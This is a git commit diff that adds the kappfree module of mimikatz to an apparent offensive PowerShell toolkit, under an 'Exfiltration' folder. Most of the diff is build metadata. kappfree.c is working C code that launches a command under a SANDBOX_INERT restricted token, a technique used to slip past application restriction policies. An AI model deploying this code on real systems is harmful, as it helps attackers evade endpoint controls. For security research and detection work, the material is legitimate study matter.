Adding Invoke-Mimikatz and Invoke-Ninjacopy

23 files changed, 193 insertions, 0 deletions

diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/CL.read.1.tlog b/Exfiltration/mimikatz-1.0/kappfree/Win32/CL.read.1.tlog
new file mode 100644
index 0000000..574462d
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/kappfree/Win32/CL.read.1.tlog
diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/CL.write.1.tlog b/Exfiltration/mimikatz-1.0/kappfree/Win32/CL.write.1.tlog
new file mode 100644
index 0000000..1393f52
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/kappfree/Win32/CL.write.1.tlog
diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/cl.command.1.tlog b/Exfiltration/mimikatz-1.0/kappfree/Win32/cl.command.1.tlog
new file mode 100644
index 0000000..05c99d0
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/kappfree/Win32/cl.command.1.tlog
diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/kappfree.dll.intermediate.manifest b/Exfiltration/mimikatz-1.0/kappfree/Win32/kappfree.dll.intermediate.manifest
new file mode 100644
index 0000000..ecea6f7
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/kappfree/Win32/kappfree.dll.intermediate.manifest
@@ -0,0 +1,10 @@
+<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
+<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
+  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
+    <security>
+      <requestedPrivileges>
+        <requestedExecutionLevel level='asInvoker' uiAccess='false' />
+      </requestedPrivileges>
+    </security>
+  </trustInfo>
+</assembly>
diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/kappfree.lastbuildstate b/Exfiltration/mimikatz-1.0/kappfree/Win32/kappfree.lastbuildstate
new file mode 100644
index 0000000..4d28193
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/kappfree/Win32/kappfree.lastbuildstate
@@ -0,0 +1,2 @@
+#v4.0:v100
+Release|Win32|C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\|
diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/kappfree.res b/Exfiltration/mimikatz-1.0/kappfree/Win32/kappfree.res
new file mode 100644
index 0000000..416efb2
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/kappfree/Win32/kappfree.res
diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/kappfree.write.1.tlog b/Exfiltration/mimikatz-1.0/kappfree/Win32/kappfree.write.1.tlog
new file mode 100644
index 0000000..352791c
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/kappfree/Win32/kappfree.write.1.tlog
@@ -0,0 +1,5 @@
+^C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\kappfree\kappfree.vcxproj
+C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\Win32\kappfree.lib
+C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\Win32\kappfree.lib
+C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\Win32\kappfree.exp
+C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\Win32\kappfree.exp
diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/link-cvtres.read.1.tlog b/Exfiltration/mimikatz-1.0/kappfree/Win32/link-cvtres.read.1.tlog
new file mode 100644
index 0000000..46b134b
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/kappfree/Win32/link-cvtres.read.1.tlog
@@ -0,0 +1 @@
+ÿþ
\ No newline at end of file
diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/link-cvtres.write.1.tlog b/Exfiltration/mimikatz-1.0/kappfree/Win32/link-cvtres.write.1.tlog
new file mode 100644
index 0000000..46b134b
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/kappfree/Win32/link-cvtres.write.1.tlog
@@ -0,0 +1 @@
+ÿþ
\ No newline at end of file
diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/link.command.1.tlog b/Exfiltration/mimikatz-1.0/kappfree/Win32/link.command.1.tlog
new file mode 100644
index 0000000..cdc5689
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/kappfree/Win32/link.command.1.tlog
diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/link.read.1.tlog b/Exfiltration/mimikatz-1.0/kappfree/Win32/link.read.1.tlog
new file mode 100644
index 0000000..b97e650
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/kappfree/Win32/link.read.1.tlog
diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/link.write.1.tlog b/Exfiltration/mimikatz-1.0/kappfree/Win32/link.write.1.tlog
new file mode 100644
index 0000000..f8b3fd9
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/kappfree/Win32/link.write.1.tlog
diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/mt.command.1.tlog b/Exfiltration/mimikatz-1.0/kappfree/Win32/mt.command.1.tlog
new file mode 100644
index 0000000..be34103
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/kappfree/Win32/mt.command.1.tlog
diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/mt.read.1.tlog b/Exfiltration/mimikatz-1.0/kappfree/Win32/mt.read.1.tlog
new file mode 100644
index 0000000..23f6601
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/kappfree/Win32/mt.read.1.tlog
diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/mt.write.1.tlog b/Exfiltration/mimikatz-1.0/kappfree/Win32/mt.write.1.tlog
new file mode 100644
index 0000000..53b60f3
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/kappfree/Win32/mt.write.1.tlog
diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/rc.command.1.tlog b/Exfiltration/mimikatz-1.0/kappfree/Win32/rc.command.1.tlog
new file mode 100644
index 0000000..92ee084
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/kappfree/Win32/rc.command.1.tlog
diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/rc.read.1.tlog b/Exfiltration/mimikatz-1.0/kappfree/Win32/rc.read.1.tlog
new file mode 100644
index 0000000..6f2e9b0
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/kappfree/Win32/rc.read.1.tlog
diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/rc.write.1.tlog b/Exfiltration/mimikatz-1.0/kappfree/Win32/rc.write.1.tlog
new file mode 100644
index 0000000..c18037c
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/kappfree/Win32/rc.write.1.tlog
diff --git a/Exfiltration/mimikatz-1.0/kappfree/kappfree.c b/Exfiltration/mimikatz-1.0/kappfree/kappfree.c
new file mode 100644
index 0000000..63130c9
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/kappfree/kappfree.c
@@ -0,0 +1,34 @@
+/*	Benjamin DELPY `gentilkiwi`
+	http://blog.gentilkiwi.com
+	benjamin@gentilkiwi.com
+	Licence : http://creativecommons.org/licenses/by/3.0/fr/
+*/
+#include "kappfree.h"
+
+extern __declspec(dllexport) void __cdecl startW(HWND hwnd, HINSTANCE hinst, LPWSTR lpszCmdLine, int nCmdShow)
+{
+	HANDLE monToken, monSuperToken;
+	wchar_t * commandLine;
+	PROCESS_INFORMATION mesInfosProcess;
+	STARTUPINFO mesInfosDemarrer;
+
+	if(OpenProcessToken(GetCurrentProcess(), TOKEN_ASSIGN_PRIMARY | TOKEN_DUPLICATE | TOKEN_QUERY /*| TOKEN_IMPERSONATE*/, &monToken))
+	{
+		if(CreateRestrictedToken(monToken, SANDBOX_INERT, 0, NULL, 0, NULL, 0, NULL, &monSuperToken))
+		{
+			RtlZeroMemory(&mesInfosProcess, sizeof(PROCESS_INFORMATION));
+			RtlZeroMemory(&mesInfosDemarrer, sizeof(STARTUPINFO));
+			mesInfosDemarrer.cb = sizeof(STARTUPINFO);
+			
+			commandLine = _wcsdup(lpszCmdLine);
+			if(CreateProcessAsUser(monSuperToken, NULL, commandLine, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &mesInfosDemarrer, &mesInfosProcess))
+			{
+				CloseHandle(mesInfosProcess.hThread);
+				CloseHandle(mesInfosProcess.hProcess);
+			}
+			free(commandLine);
+			CloseHandle(monSuperToken);
+		}
+		CloseHandle(monToken);
+	}
+}
diff --git a/Exfiltration/mimikatz-1.0/kappfree/kappfree.h b/Exfiltration/mimikatz-1.0/kappfree/kappfree.h
new file mode 100644
index 0000000..22ffbc2
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/kappfree/kappfree.h
@@ -0,0 +1,9 @@
+/*	Benjamin DELPY `gentilkiwi`
+	http://blog.gentilkiwi.com
+	benjamin@gentilkiwi.com
+	Licence : http://creativecommons.org/licenses/by/3.0/fr/
+*/
+#pragma once
+#include <windows.h>
+
+extern __declspec(dllexport) void __cdecl startW(HWND hwnd, HINSTANCE hinst, LPWSTR lpszCmdLine, int nCmdShow);
diff --git a/Exfiltration/mimikatz-1.0/kappfree/kappfree.rc b/Exfiltration/mimikatz-1.0/kappfree/kappfree.rc
new file mode 100644
index 0000000..f08bc56
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/kappfree/kappfree.rc
diff --git a/Exfiltration/mimikatz-1.0/kappfree/kappfree.vcxproj b/Exfiltration/mimikatz-1.0/kappfree/kappfree.vcxproj
new file mode 100644
index 0000000..ef29473
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/kappfree/kappfree.vcxproj
@@ -0,0 +1,119 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|x64">
+      <Configuration>Release</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <ProjectGuid>{E7A85049-E31E-4575-B6A0-E6F1EAA9EEB0}</ProjectGuid>
+    <Keyword>Win32Proj</Keyword>
+    <RootNamespace>kappfree</RootNamespace>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+    <UseOfMfc>Static</UseOfMfc>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+    <UseOfMfc>Static</UseOfMfc>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <LinkIncremental>false</LinkIncremental>
+    <OutDir>$(SolutionDir)$(Platform)\</OutDir>
+    <IntDir>$(Platform)\</IntDir>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <LinkIncremental>false</LinkIncremental>
+    <OutDir>$(SolutionDir)$(Platform)\</OutDir>
+    <IntDir>$(Platform)\</IntDir>
+  </PropertyGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <PrecompiledHeader>
+      </PrecompiledHeader>
+      <Optimization>Full</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;KAPPFREE_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <AdditionalIncludeDirectories>$(SolutionDir)/commun;$(SolutionDir)/modules</AdditionalIncludeDirectories>
+      <FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
+      <StringPooling>true</StringPooling>
+      <ExceptionHandling>false</ExceptionHandling>
+      <FloatingPointModel>Fast</FloatingPointModel>
+      <FloatingPointExceptions>false</FloatingPointExceptions>
+      <CreateHotpatchableImage>false</CreateHotpatchableImage>
+      <ErrorReporting>None</ErrorReporting>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>false</GenerateDebugInformation>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <AdditionalDependencies>advapi32.lib;%(AdditionalDependencies)</AdditionalDependencies>
+      <LinkErrorReporting>NoErrorReport</LinkErrorReporting>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <PrecompiledHeader>
+      </PrecompiledHeader>
+      <Optimization>Full</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;KAPPFREE_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <AdditionalIncludeDirectories>$(SolutionDir)/commun;$(SolutionDir)/modules</AdditionalIncludeDirectories>
+      <FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
+      <StringPooling>true</StringPooling>
+      <ExceptionHandling>false</ExceptionHandling>
+      <FloatingPointModel>Fast</FloatingPointModel>
+      <FloatingPointExceptions>false</FloatingPointExceptions>
+      <CreateHotpatchableImage>false</CreateHotpatchableImage>
+      <ErrorReporting>None</ErrorReporting>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>false</GenerateDebugInformation>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <AdditionalDependencies>advapi32.lib;%(AdditionalDependencies)</AdditionalDependencies>
+      <LinkErrorReporting>NoErrorReport</LinkErrorReporting>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <ClCompile Include="kappfree.c" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="kappfree.h" />
+  </ItemGroup>
+  <ItemGroup>
+    <ResourceCompile Include="kappfree.rc" />
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+  </ImportGroup>
+</Project>
\ No newline at end of file
diff --git a/Exfiltration/mimikatz-1.0/kappfree/kappfree.vcxproj.filters b/Exfiltration/mimikatz-1.0/kappfree/kappfree.vcxproj.filters
new file mode 100644
index 0000000..987362e
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/kappfree/kappfree.vcxproj.filters
@@ -0,0 +1,12 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup>
+    <ClInclude Include="kappfree.h" />
+  </ItemGroup>
+  <ItemGroup>
+    <ResourceCompile Include="kappfree.rc" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="kappfree.c" />
+  </ItemGroup>
+</Project>
\ No newline at end of file